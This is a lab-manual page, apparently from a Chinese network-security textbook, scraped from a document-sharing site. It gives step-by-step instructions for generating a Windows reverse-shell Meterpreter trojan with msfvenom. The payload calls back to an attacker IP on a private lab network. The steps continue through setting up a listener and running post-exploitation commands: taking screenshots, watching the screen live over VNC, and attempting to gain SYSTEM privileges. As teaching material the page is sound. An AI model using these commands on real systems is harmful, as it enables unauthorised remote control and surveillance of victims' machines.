- 1、本文档共8页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
使用msfvenom生成反弹木马Shell木马实
例
当我们需要往目标主机上传木马文件时,我们就可以利用
msfvenom生成一个木马文件,并用Metersploit进行监听,从而
就能够反弹回shell,最终控制目标主机。
我们在终端中输入ifconfig命令查看本机IP地址,可以看
到本机IP地址为:192.168.188.128,作为本次试验的攻击主机。
被入侵主机的IP地址为192.168.188.135
在kali中启动msf
打开终端模拟器,输入suroot及root密码,以root权限进行
操作。在进入root后,输入msfconsole以打开msfvenom程序。
1、先查找使用的具体语句
进入程序后,为了更准确的编写攻击语句,可以先进入msf中
利用search进行搜索具体的使用语句
(payload/windows/meterpreter/reverse_tcp默认是攻击x86
的windows机器,如需要攻击x64的windows机器可以利用
payload/windows/x64/meterpreter/reverse_tcp)
在终端处输入searchmeterpreter/reverse_tcp,在返回的
结果中可以看到结果11是本次实验所需要的攻击语句
2、利用msfvenom生成一个back.exe反弹shell的木马
如何利用msfvenom生成一个名为:back.exe反弹shell的
木马,首先生成一个Windows的木马应用程序:back.exe,并反
弹shell至192.168.188.128:4444端口。
可以利用metersploit进行监听,在终端处输入msfvenom-
pwindows/meterpreter/reverse_tcpLHOST=192.168.188.128
LPORT=4444-fexe-oback.exe
其中-p是payload,就是控制目标主机以后,要让他干什么。
具体的命令就是payload.-f是生成的后门的格式,-o是输出
文件名,LHOST是攻击发起者的IP,LPORT是受害者将要连接的
攻击者打开的端口。
通过输入该命令得到反弹shell木马:back.exe
启动msfconsole进入mataspolit开始监听
3、设置监听选项
利用multi/handler进行监听来自受害者192.168.188.135
的反弹过来的shell,
分别输入命令
useexploit/multi/handler
setpayloadwindows/meterpreter/reverse_tcp
setLHOST192.168.188.128
setLPORT4444
4、查看监听状态
在命令端中接着输入showoptions以查看监听状态,可以看
到上一步设置成功
5、开启监听
在命令端中接着输入run以开启监听
6、在受害主机上运行back.exe
将生成的back.exe移至受害主机,并在受害主机点击运行
back.exe
7.查看监听情况
可以看到msf监听连接成功并创建meterpreter会话
8.meterpreter简单系统命令
1)查看受害主机用户
在终端处输入getuid来查看受害主机用户,可以看到受害主
机的用户名
2)查看受害主机进程
在终端处输入ps命令来获取目标主机上正在运行的进程信息
3)查看受害主机系统信息
在终端处输入sysinfo以查看受害主机系统信息,可以看到
受害主机是一台系统为window7的主机
4)对目标主机进行截图
在终端处输入screenshot可以看到截图保存在
/home/admin123文件夹下
5)查看截图
新打开一个终端,并在终端下输入ls查看截图是否存在
6)查看受害主机画面
在终端处输入runvnc可以远程实时监控目标机的画面
常用命令
getuid查看当前权限
getsystem尝试获取system权限
s
您可能关注的文档
- 计算机网络安全技术(石淑华 第7版)(微课版)-教案全套 1. 网络安全概述--8.Windows安全.docx
- 计算机网络安全技术(第7版)(微课版) 实验手册---ARP欺骗实例-Kali.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Kali的基本配置.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Kali的基本应用.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Kali虚拟机的安装.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Matesploit的基本使用(1).pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Matesploit的基本使用(2).pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Nessus扫描器的使用.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Nmap扫描器的使用.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Windows防火墙IPsec配置的.pdf
- 中国国家标准 GB/T 4214.17-2024家用和类似用途电器噪声测试方法 干式清洁机器人的特殊要求.pdf
- GB/T 4214.17-2024家用和类似用途电器噪声测试方法 干式清洁机器人的特殊要求.pdf
- 《GB/Z 43202.1-2024机器人 GB/T 36530的应用 第1部分:安全相关试验方法》.pdf
- GB/Z 43202.1-2024机器人 GB/T 36530的应用 第1部分:安全相关试验方法.pdf
- 中国国家标准 GB/Z 43202.1-2024机器人 GB/T 36530的应用 第1部分:安全相关试验方法.pdf
- 中国国家标准 GB/T 32455-2024航天术语 运输系统.pdf
- GB/T 32455-2024航天术语 运输系统.pdf
- 《GB/T 32455-2024航天术语 运输系统》.pdf
- GB/T 44369-2024用于技术设计的人体运动生物力学测量基础项目.pdf
- 中国国家标准 GB/T 44369-2024用于技术设计的人体运动生物力学测量基础项目.pdf
文档评论(0)